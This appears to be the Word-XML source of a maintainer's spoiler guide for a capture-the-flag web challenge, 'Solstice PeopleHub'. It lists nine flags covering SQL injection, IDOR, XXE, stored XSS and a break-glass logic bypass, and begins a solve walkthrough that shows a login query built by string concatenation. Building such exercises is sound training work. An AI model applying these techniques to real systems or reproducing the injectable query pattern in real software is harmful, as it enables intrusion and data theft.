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B78"/>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>Solstice PeopleHub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Challenge Guide</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Developer/maintainer reference: the complete task list, a fully verified solve walkthrough with exact payloads, a tiered hint system for stuck players, and the system architecture. Everything in this document was tested against the live application, not written from memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>This is a spoiler document.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> See README.md for the player-facing orientation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Where this sits in the outer game</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Login → Exhibit A → Stage 2 → Exhibit B → STAGE 3 / EXHIBIT C (this document) → Stage 4 → Stage 5 → Stage 6 → Epilogue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reaching Exhibit C requires </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>stage3 = true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the outer session (solve Exhibit B first). Exhibit C's own completion requires two things, checked by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>POST /api/exhibit-c</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`investigation`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — all nine PeopleHub sub-flags below are true (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>stage3_complete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>challenge_state</w:t>
      </w:r>
      <w:r>
        <w:t>, keyed by the outer session token).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`code`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the correct emergency access code, checked against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>challenges.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">'s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exhibitC.fields.code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash (unchanged from before this rebuild).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Both together set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>solved3 = true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the outer session and hand back </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exhibitC.flag</w:t>
      </w:r>
      <w:r>
        <w:t>, which unlocks Stage 4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Task list — the nine investigation flags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576"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Where</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PeopleHub login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQL injection (authentication bypass)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Employee Directory search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQL injection (UNION)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_employee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Employee Profile (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>:id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> lookup)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQL injection (UNION)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>People Analytics → Reports (segment filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQL injection (UNION)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HR Requests search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQL injection (UNION)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Documents (detail/download route)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Broken object-level authorization (IDOR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_xxe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Administration → Employee Data Import</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>XXE (external entity injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_xss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Help &amp; Support → Share Feedback with HR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Stored XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stage3_emergency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Security → Emergency Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Business-logic bypass (break-glass code)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">None of these are shown to the player anywhere. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/api/exhibit-c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> only ever returns the combined </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>investigation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> boolean. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/ctf-admin.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (localhost-only) is the one place that shows the full per-flag grid, for testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rough intended order</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (not enforced — a strong player can jump around): login → directory → profile → reports/requests (any order) → documents → import/XXE → feedback/XSS → emergency access → back to Exhibit C. The emergency-access code is only discoverable via the XXE chain, so flag 9 has a hard dependency on flag 7 even though nothing in the code enforces it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Full solve walkthrough (verified)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every payload below was run against the live server and confirmed working. Login accounts change their </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>specific</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> employee identities on every reseed (the RNG is seeded, so the same seed always produces the same data — but if you change </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SEED_RNG_SEED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the specific names/IDs shift, though the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>techniques</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> below remain identical since they never depend on a specific value).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 — Login (blind, then targeted escalation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The login form (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>POST /api/peoplehub/auth/login</w:t>
      </w:r>
      <w:r>
        <w:t>) builds its query by string concatenation, no filtering, no hints anywhere in the UI:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>SELECT u.user_id, u.username, u.role_id, u.employee_id, u.is_active, r.name AS roleName</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>FROM users u JOIN roles r ON r.role_id = u.role_id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
